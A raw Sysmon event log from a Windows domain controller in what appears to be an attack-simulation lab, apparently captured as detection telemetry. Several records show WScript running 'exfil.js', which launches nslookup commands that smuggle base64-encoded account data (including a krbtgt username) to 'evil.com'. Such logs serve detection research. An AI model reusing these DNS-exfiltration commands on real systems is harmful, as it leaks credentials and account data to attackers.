14:21:47.181{2E1864BB-18FB-629A-C545-000000005F02}56084636C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C445-000000005F02}7620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.151{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C545-000000005F02}5608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.151{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C445-000000005F02}7620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.134{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.134{2E1864BB-18E0-629A-6742-000000005F02}39761276C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-C445-000000005F02}7620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.147{2E1864BB-18FB-629A-C445-000000005F02}7620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.134{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjvm.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.103{2E1864BB-18FB-629A-C245-000000005F02}72644624C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C345-000000005F02}644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.079{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.079{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.079{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C345-000000005F02}644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.079{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.079{2E1864BB-18FB-629A-C145-000000005F02}72967484C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-C345-000000005F02}644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.079{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.088{2E1864BB-18FB-629A-C345-000000005F02}644C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-C145-000000005F02}7296C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjvm.tmp 2>&1 10341000x8000000000000000214122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.063{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-C245-000000005F02}7264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.063{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-C245-000000005F02}7264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-18FB-629A-C245-000000005F02}72644624C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C145-000000005F02}7296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C245-000000005F02}7264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.048{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C145-000000005F02}7296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.032{2E1864BB-18E0-629A-6742-000000005F02}39766660C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-C145-000000005F02}7296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.047{2E1864BB-18FB-629A-C145-000000005F02}7296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjvm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.032{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbkk.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-18FA-629A-BF45-000000005F02}57401804C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-C045-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 